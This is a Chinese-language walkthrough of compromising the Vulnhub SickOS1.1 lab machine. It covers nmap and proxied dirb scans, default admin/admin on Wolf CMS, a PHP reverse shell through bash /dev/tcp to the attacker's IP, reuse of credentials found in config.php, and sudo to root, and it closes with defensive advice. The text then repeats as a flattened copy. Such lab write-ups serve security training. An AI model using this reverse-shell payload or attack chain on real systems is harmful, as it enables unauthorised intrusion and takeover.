Vulnhub靶机实操笔记-SickOS1.1-解法一
字数 1420 2025-08-10 21:10:14

SickOS1.1 靶机渗透测试实战教程

靶机概述

SickOS1.1 是 Vulnhub 上的一个中等难度靶机,主要考察渗透测试人员对代理服务器利用、CMS 漏洞利用和 Linux 提权等技能。本教程将详细记录从信息收集到最终获取 root 权限的完整过程。

环境准备

  • 攻击机:Kali Linux (IP: 192.168.32.131)
  • 靶机:SickOS1.1 (IP: 192.168.32.137)
  • 靶机下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

渗透测试流程

一、信息收集

1. 主机发现

sudo nmap -sn 192.168.32.0/24

确认靶机 IP 为 192.168.32.137

2. 端口扫描

快速扫描开放端口:

sudo nmap --min-rate 10000 -p- 192.168.32.137

发现开放端口:22(SSH)、3128、8080

3. 服务版本探测

TCP 扫描:

sudo nmap -sT -sV -O -p22,3128,8080 192.168.32.137

UDP 扫描:

sudo nmap -sU -p22,3128,8080 192.168.32.137

发现 3128 端口运行 Squid 代理服务器 (版本 3.1.19)

4. 漏洞扫描

sudo nmap --script=vuln -p22,3128,8080 192.168.32.137

二、Squid 代理服务器利用

1. 访问 Squid 代理

通过浏览器访问 http://192.168.32.137:3128 确认代理服务运行

2. 目录扫描

使用 dirb 通过代理扫描 web 目录:

sudo dirb http://192.168.32.137 -p http://192.168.32.137:3128

关键发现:

  • /robots.txt 提示 wolfcms
  • 访问 http://192.168.32.137/wolfcms 确认 Wolf CMS 存在

三、Wolf CMS 漏洞利用

1. 后台登录

访问后台登录页面:

http://192.168.32.137/wolfcms/?/admin/login

尝试弱口令:

  • 用户名:admin
  • 密码:admin
    成功登录后台

2. 上传 PHP 反弹 Shell

在 Articles 部分编辑页面,插入 PHP 反弹 Shell 代码:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.32.131/443 0>&1'");?>

3. 获取反向 Shell

在 Kali 上启动监听:

nc -lvnp 443

访问 Articles 页面触发 PHP 代码,成功获取反向 Shell

四、内网提权

1. 系统信息收集

uname -a

确认系统名为 SickOs

2. 用户信息收集

cat /etc/passwd

发现有交互 shell 的用户:root、sickos

3. 配置文件检查

查看当前目录下的 config.php 文件:

vi config.php

发现数据库凭据:

  • 用户名:root
  • 密码:john@123

4. 密码爆破尝试

尝试用获得的密码爆破系统用户:

  • wolf cms: admin/admin
  • 数据库: root/john@123
  • 系统用户: sickos/john@123 (成功)

5. Sudo 提权

检查 sudo 权限:

sudo -l

发现 sickos 用户有所有 sudo 权限,直接提权:

sudo /bin/bash

成功获取 root 权限

关键知识点总结

  1. 代理服务器利用

    • Squid 代理服务器可用于绕过某些访问限制
    • 扫描工具需要配置代理才能发现隐藏内容
  2. CMS 漏洞利用

    • 弱口令是常见突破口
    • 后台文件编辑功能可被用于代码执行
  3. Linux 提权

    • 配置文件常包含敏感信息
    • 密码复用是常见问题
    • Sudo 权限检查是提权关键步骤
  4. 渗透测试方法论

    • 信息收集 → 漏洞发现 → 漏洞利用 → 权限提升
    • 每个阶段都要仔细记录发现的信息

防御建议

  1. 避免使用弱口令和默认凭据
  2. 限制代理服务器的访问权限
  3. CMS 后台应限制代码执行功能
  4. 避免密码复用
  5. 合理配置 sudo 权限
  6. 定期检查系统配置文件权限

通过本教程,您应该掌握了从信息收集到最终提权的完整渗透测试流程,以及针对此类系统的防御措施。

SickOS1.1 靶机渗透测试实战教程 靶机概述 SickOS1.1 是 Vulnhub 上的一个中等难度靶机,主要考察渗透测试人员对代理服务器利用、CMS 漏洞利用和 Linux 提权等技能。本教程将详细记录从信息收集到最终获取 root 权限的完整过程。 环境准备 攻击机:Kali Linux (IP: 192.168.32.131) 靶机:SickOS1.1 (IP: 192.168.32.137) 靶机下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z 渗透测试流程 一、信息收集 1. 主机发现 确认靶机 IP 为 192.168.32.137 2. 端口扫描 快速扫描开放端口: 发现开放端口:22(SSH)、3128、8080 3. 服务版本探测 TCP 扫描: UDP 扫描: 发现 3128 端口运行 Squid 代理服务器 (版本 3.1.19) 4. 漏洞扫描 二、Squid 代理服务器利用 1. 访问 Squid 代理 通过浏览器访问 http://192.168.32.137:3128 确认代理服务运行 2. 目录扫描 使用 dirb 通过代理扫描 web 目录: 关键发现: /robots.txt 提示 wolfcms 访问 http://192.168.32.137/wolfcms 确认 Wolf CMS 存在 三、Wolf CMS 漏洞利用 1. 后台登录 访问后台登录页面: 尝试弱口令: 用户名:admin 密码:admin 成功登录后台 2. 上传 PHP 反弹 Shell 在 Articles 部分编辑页面,插入 PHP 反弹 Shell 代码: 3. 获取反向 Shell 在 Kali 上启动监听: 访问 Articles 页面触发 PHP 代码,成功获取反向 Shell 四、内网提权 1. 系统信息收集 确认系统名为 SickOs 2. 用户信息收集 发现有交互 shell 的用户:root、sickos 3. 配置文件检查 查看当前目录下的 config.php 文件: 发现数据库凭据: 用户名:root 密码:john@123 4. 密码爆破尝试 尝试用获得的密码爆破系统用户: wolf cms: admin/admin 数据库: root/john@123 系统用户: sickos/john@123 (成功) 5. Sudo 提权 检查 sudo 权限: 发现 sickos 用户有所有 sudo 权限,直接提权: 成功获取 root 权限 关键知识点总结 代理服务器利用 : Squid 代理服务器可用于绕过某些访问限制 扫描工具需要配置代理才能发现隐藏内容 CMS 漏洞利用 : 弱口令是常见突破口 后台文件编辑功能可被用于代码执行 Linux 提权 : 配置文件常包含敏感信息 密码复用是常见问题 Sudo 权限检查是提权关键步骤 渗透测试方法论 : 信息收集 → 漏洞发现 → 漏洞利用 → 权限提升 每个阶段都要仔细记录发现的信息 防御建议 避免使用弱口令和默认凭据 限制代理服务器的访问权限 CMS 后台应限制代码执行功能 避免密码复用 合理配置 sudo 权限 定期检查系统配置文件权限 通过本教程,您应该掌握了从信息收集到最终提权的完整渗透测试流程,以及针对此类系统的防御措施。